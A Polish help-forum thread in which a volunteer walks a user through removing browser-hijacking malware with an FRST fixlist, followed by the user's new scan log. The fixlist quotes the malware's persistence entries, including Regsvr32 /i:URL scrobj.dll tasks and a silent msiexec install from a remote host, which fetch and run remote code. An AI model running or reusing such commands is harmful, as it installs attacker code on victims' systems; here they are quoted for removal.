Wcześniej od tego zrobiłem skan adwcleanerem ale nic to za wiele nie pomogło poza usunięciem niektórych śmieci. Po raz 1-szy mi się coś takie zdarza więc proszę o pomoc i wyrozumiałość. Co zrobić żeby się tego dziadostwa pozbyć? Pozdrawiam i będę wdzięczny za pomoc.
apollo2
~user
 
Posty: 2
Dołączenie: 22 Kwi 2017, 22:07



"infekcja" przeglądarek - proszę o pomoc.

Postprzez ordynat 22 Kwi 2017, 22:41

1) Spróbuj odinstalować te programy:
(co do programów oznaczonych chociaż ja nie jestem przekonany, czy to "złe" - decyzję podejnij sam.)
AION (HKLM\...\AION) (Version: - AION) <==== UWAGA (chociaż ja nie jestem przekonany, czy to "złe")
Core Temp Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Core Temp Packages) (Version: - ) <==== UWAGA
DarkEra (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\DarkEra) (Version: - DarkEra) <==== UWAGA (chociaż ja nie jestem przekonany, czy to "złe")
EASEUS Partition Master Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\EASEUS Partition Master Packages) (Version: - ) <==== UWAGA
HWMonitor Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\HWMonitor Packages) (Version: - ) <==== UWAGA
Search App by Ask (HKLM-x32\...\{4F524A2D-5350-4500-76A7-A758B70C2E03}) (Version: 12.46.3.4268 - APN, LLC) <==== UWAGA
Shopping App by Ask (HKLM-x32\...\{53504353-502D-5341-5400-A758B70C2600}) (Version: 12.38.0.3425 - APN, LLC)
Unigine Valley Benchmark version 1.0 (HKLM-x32\...\Unigine Valley Benchmark_is1) (Version: 1.0 - Unigine Corp.) <==== UWAGA (chociaż ja nie jestem przekonany, czy to "złe")
Winamp Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Winamp Packages) (Version: - ) <==== UWAGA
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL cenzura!ÇÕES LTDA) <==== UWAGA


2)
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)

Te skróty dam do usuwania, bo przekierowują do fałszywej przeglądarki C:\Program Files (x86)\Eastness\Application\chrome.exe, która wygląda jak Google Chrome, ale w rzeczywistości jest Trojanem.
Potem zrobisz sobie nowe skróty w tych samych lokalizacjach.

3) Masz też fałszywego Firefoxa, oprócz "dobrego":
C:\Program Files (x86)\Firefox\Firefox.exe - zły
C:\Program Files (x86)\Mozilla Firefox\firefox.exe - dobry


4) Otwórz Notatnik i wklej w nim:
Task: {7EEA6424-BBCF-4ECA-8DE2-B51166346CB6} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== scrobj.dll
Task: {BAB785D2-B667-49B6-83DC-099BD0D65BE3} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== scrobj.dll
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Eastness
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Program Files (x86)\MyPC Backup
RemoveDirectory: C:\Users\Adam\AppData\Roaming\SSMgre
RemoveDirectory: C:\Program Files (x86)\BiaoJi
RemoveDirectory: C:\ProgramData\Software
RemoveDirectory: C:\Users\Adam\AppData\Local\Eastness
RemoveDirectory: C:\Program Files (x86)\Elex-tech
RemoveDirectory: C:\Users\Adam\AppData\Roaming\Elex-tech
RemoveDirectory: C:\Program Files\MK
RemoveDirectory: C:\Users\Adam\AppData\Local\3DM
FirewallRules: [{45E1A9CB-3A83-405D-A7A1-1467833BDE58}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{0622DF48-9942-4C07-8A38-969F01B16F50}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{4DB7B6EB-50A0-49FE-8C66-D2330DD0CDC4}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{45E1A9CB-3A83-405D-A7A1-1467833BDE58}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{E32899BB-DB0B-4992-885D-1DE33CD6200D}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-1er162_z4y42ghsxxxxz4y42ghs.dat
FirewallRules: [{5818BB2E-18C6-4808-9E91-566A6BEE8ED8}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dm003-1er162_z4y42ghsxxxxz4y42ghs.dat
2017-04-20 09:24 - 2017-04-20 09:24 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 09:24 - 2017-04-20 09:24 - 00000000 _____ C:\Windows\SysWOW64\11
S3 ALSysIO; \??\C:\Users\Adam\AppData\Local\Temp\ALSysIO64.sys [X] <==== UWAGA
S3 dbx; system32\DRIVERS\dbx.sys [X]
S3 intaud_WaveExtensible; \SystemRoot\system32\drivers\intelaud.sys [X]
S3 iwdbus; \SystemRoot\System32\drivers\iwdbus.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 VBoxNetFlt; \SystemRoot\system32\DRIVERS\VBoxNetFlt.sys [X]
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil cenzura!ções Ltda) <==== UWAGA
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X]
C:\ProgramData\Software\Apple\Apps\Notification.dll
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492586333&z=992be6b061a858d166d62d5g6z4tao4wdb1q6c0ccc&from=che0812&uid=ST1000DM003-1ER162_Z4Y42GHSXXXXZ4Y42GHS&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
FF Plugin HKU\S-1-5-21-1070030570-2694662635-206350218-1001: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\Adam\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
FF user.js: detected! => C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default\user.js [2017-04-21]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
BHO-x32: Brak nazwy -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Brak pliku
BHO: Brak nazwy -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Brak pliku
GroupPolicy: Ograniczenia - Chrome <======= UWAGA
IFEO\taskmgr.exe: [Debugger]
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== /q
HOSTS:
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

5) Zrób nowe logi FRST - już bez Shortcut.
.
ordynat
~user
 
Posty: 4765
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 866



"infekcja" przeglądarek - proszę o pomoc.

Postprzez apollo2 24 Kwi 2017, 14:09

Dzięki Ci za pomoc, odinstalowałem prawie wszystkie programy z listy (UWAGA),ale nie mogę tylko odinstalować "Search App by Ask" bo pisze mi coś że konto już istnieje.. więc utowrzyłem ten plik tekstowy i zrobiłem napraw, restart komputera. ponowy skan z frst, wcześniej jeszcze utworzyłem nowy skrót do chroma.
A o to logi: Addition
Kod: Zaznacz wszystko
Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 23-04-2017 01
Uruchomiony przez Adam (24-04-2017 13:52:22)
Uruchomiony z F:\wiro
Windows 8.1 (Update) (X64) (2015-02-26 19:33:27)
Tryb startu: Normal
==========================================================


==================== Konta uĹĽytkownikĂłw: =============================

Adam (S-1-5-21-1070030570-2694662635-206350218-1001 - Administrator - Enabled) => C:\Users\Adam
Administrator (S-1-5-21-1070030570-2694662635-206350218-500 - Administrator - Enabled) => C:\Users\Administrator
Gość (S-1-5-21-1070030570-2694662635-206350218-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1070030570-2694662635-206350218-1003 - Limited - Enabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

ACDSee 6.0 PowerPack (HKLM-x32\...\{271B64EE-3E1B-4381-A8FE-012390050492}) (Version: 6.0.3 - ACD Systems Ltd.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
AION (HKLM\...\AION) (Version:  - AION) <==== UWAGA
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software)
AVG PC TuneUp 2015 (HKLM-x32\...\AVG PC TuneUp) (Version: 15.0.1001.185 - AVG Technologies)
AVG PC TuneUp 2015 (pl-PL) (x32 Version: 15.0.1001.185 - AVG Technologies) Hidden
AVG PC TuneUp 2015 (x32 Version: 15.0.1001.185 - AVG Technologies) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.03 - Piriform)
CDBurnerXP (HKLM\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.4.5306 - CDBurnerXP)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.6.5931 - CDBurnerXP)
Charity Engine (HKLM-x32\...\{7309D717-F38D-436D-9537-066AA0AC7639}) (Version: 7.0.80 - Charity Engine)
Core Temp Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Core Temp Packages) (Version:  - ) <==== UWAGA
Core Temp version 0.99.8 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 0.99.8 - Arthur Liberman)
CPUID HWMonitor 1.27 (HKLM\...\CPUID HWMonitor_is1) (Version:  - )
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 5.0.1.0407 - Disc Soft Ltd)
DarkEra (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\DarkEra) (Version:  - DarkEra) <==== UWAGA
Debugging Tools for Windows (x86) (HKLM-x32\...\{300A2961-B2B5-4889-9CB9-5C2A570D08AD}) (Version: 6.11.1.404 - Microsoft Corporation)
Deluxe Ski Jump 4 (HKLM-x32\...\Deluxe Ski Jump 4_is1) (Version: 1.5.1 - Mediamond Tmi)
Dropbox (HKLM-x32\...\Dropbox) (Version: 24.4.16 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
EaseUS Partition Master 10.2 (HKLM-x32\...\EaseUS Partition Master_is1) (Version:  - EaseUS)
EASEUS Partition Master Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\EASEUS Partition Master Packages) (Version:  - ) <==== UWAGA
EaseUS Todo Backup Free 8.2  (HKLM-x32\...\EaseUS Todo Backup_is1) (Version: 8.2 - CHENGDU YIWO Tech Development Co., Ltd)
GG (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\GG) (Version: 12 - GG Network S.A.)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Drive (HKLM-x32\...\{A1238426-ECDF-4639-BE2F-8D12A97AE23C}) (Version: 2.34.5075.1619 - Google, Inc.)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
HD Tune 2.55 (HKLM-x32\...\HD Tune_is1) (Version:  - EFD Software)
Heaven Benchmark version 4.0 (HKLM-x32\...\Unigine Heaven Benchmark (Basic Edition)_is1) (Version: 4.0 - Unigine Corp.)
HWMonitor Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\HWMonitor Packages) (Version:  - ) <==== UWAGA
Infinite Media Acceleration (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Octoshape Streaming Services) (Version:  - Akamai Inc.)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{4188E70A-4D3B-447C-B366-963C9E8B4538}) (Version: 5.0.10.2907 - Intel Corporation)
ipla 2.8.7 (HKLM-x32\...\ipla) (Version: 2.8.7 - Cyfrowy Polsat S.A.)
IrfanView 4.44 (32-bit) (HKLM-x32\...\IrfanView) (Version: 4.44 - Irfan Skiljan)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
K-Lite Codec Pack 11.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.6.5 - )
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.163.2 - McAfee, Inc.)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24123 (HKLM-x32\...\{2cbcedbb-f38c-48a3-a3e1-6c6fd821a7f4}) (Version: 14.0.24123.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.41 - mIRC Co. Ltd.)
Mozilla Firefox 53.0 (x86 pl) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pl)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
MSI Afterburner 2.3.1 (HKLM-x32\...\Afterburner) (Version: 2.3.1 - MSI Co., LTD)
MSI GamingApp (HKLM-x32\...\{E0229316-E73B-484B-B9E0-45098AB38D8C}}_is1) (Version: 1.0.0.18 - MSI)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenFM (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\OpenFM) (Version: 2 - GG Network S.A.)
Oprogramowanie mikroukładu Intel® (x32 Version: 10.0.20 - Intel(R) Corporation) Hidden
Oracle VM VirtualBox 5.0.10 (HKLM\...\{F6E922CF-068D-4AFC-8DBF-4636B84AF0A5}) (Version: 5.0.10 - Oracle Corporation)
PhotoScape (HKLM-x32\...\PhotoScape) (Version:  - )
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Pro Evolution Soccer 2015 (HKLM-x32\...\UHJvRXZvbHV0aW9uU29jY2VyMjAxNQ==_is1) (Version: 1 - )
Raptr (HKLM-x32\...\Raptr) (Version:  - )
REACHit (HKLM-x32\...\{4532E4C5-C84D-4040-A044-ECFCC5C6995B}) (Version: 2.5.005.12 - Lenovo)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.23.1126.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7293 - Realtek Semiconductor Corp.)
SafeZone Stable 3.55.2393.596 (x32 Version: 3.55.2393.596 - Avast Software) Hidden
ScanSpeeder 1.5.4 (HKLM-x32\...\ScanSpeeder 1.5.4) (Version:  1.5.4 - Nitro Logic)
Search App by Ask (HKLM-x32\...\{4F524A2D-5350-4500-76A7-A758B70C2E03}) (Version: 12.46.3.4268 - APN, LLC) <==== UWAGA
Shopping App by Ask (HKLM-x32\...\{53504353-502D-5341-5400-A758B70C2600}) (Version: 12.38.0.3425 - APN, LLC)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SopCast 3.9.6 (HKLM-x32\...\SopCast) (Version: 3.9.6 - www.sopcast.com)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
System Requirements Lab (HKLM-x32\...\{8DCAB1D8-F20C-4733-9B5F-646DDFEB59C9}) (Version: 6.1.1.0 - Husdawg, LLC)
Tlen.pl (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Tlen.pl) (Version:  - )
Unigine Valley Benchmark version 1.0 (HKLM-x32\...\Unigine Valley Benchmark_is1) (Version: 1.0 - Unigine Corp.) <==== UWAGA
VGA Boost (HKLM-x32\...\{809ACFAE-9A4D-4C60-9223-D8B615CD8CBA}}_is1) (Version: 1.0.0.8 - MSI)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.37.0 (HKLM\...\VulkanRT1.0.37.0) (Version: 1.0.37.0 - LunarG, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
Winamp Packages (HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Winamp Packages) (Version:  - ) <==== UWAGA
WinRAR 5.31 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-1070030570-2694662635-206350218-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Adam\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {07FFBB38-9399-4F74-A986-63BFF331F634} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)
Task: {3307A47E-C8F4-4F36-8139-0F99F5BE3E58} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-06-13] (Dropbox, Inc.)
Task: {59748C6B-F967-4ADB-B891-0BDACFDDAFD1} - System32\Tasks\SafeZone scheduled Autoupdate 1459685331 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {66480450-3889-489E-8D75-844E8CCDAC06} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {7708D1D6-41A6-47F5-A65C-DFCA23EC18AB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-27] (Google Inc.)
Task: {98F4CC0B-F31A-420E-A87C-75201EB84200} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-04] (AVAST Software)
Task: {A47567B8-9D12-4781-82C5-D3A7B7F35898} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-27] (Google Inc.)
Task: {AA65219A-4C3C-4D84-AA41-19443D201711} - System32\Tasks\RTSS => C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTSS.exe [2013-01-23] ()
Task: {AC1D1C80-C99A-40C6-B2C5-953F1E7F4328} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-04-13] (AVAST Software)
Task: {B017C9AE-A5F5-4440-A333-3E9CFC9E3067} - System32\Tasks\Lenovo\REACHit Agent Update => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-05-18] (Lenovo)
Task: {B3F47DB7-1864-4241-AE93-1A086F10EA5C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-02-19] (Piriform Ltd)
Task: {BF1F34D5-80CA-43EF-A484-953E99F27812} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-06-13] (Dropbox, Inc.)
Task: {D43D5837-1FCB-48F8-A5B6-F84420FF18F3} - System32\Tasks\Lenovo\REACHit Agent Startup => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2016-05-18] (Lenovo)
Task: {DC4FD262-3AE9-4E36-99B4-EFBBEB1885B4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-11] (Adobe Systems Incorporated)
Task: {E3BDD352-9C03-40C5-BDDF-9933C86413E9} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-03-16] (Advanced Micro Devices, Inc.)
Task: {E7E638E7-74CD-41E6-9301-E887B6BE759F} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe [2014-10-17] (AVG Technologies)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe

==================== SkrĂłty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default

==================== Załadowane moduły (filtrowane) ==============

2014-05-13 09:15 - 2013-05-07 09:45 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2014-08-25 17:01 - 2014-08-25 17:01 - 00209712 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
2014-08-25 17:01 - 2014-08-25 17:01 - 00057648 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\NetworkHeuristic.dll
2014-08-25 17:01 - 2014-08-25 17:01 - 00057648 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTEncryptionCheck.dll
2014-08-25 17:01 - 2014-08-25 17:01 - 00037168 _____ () C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\ISCTNetMon.dll
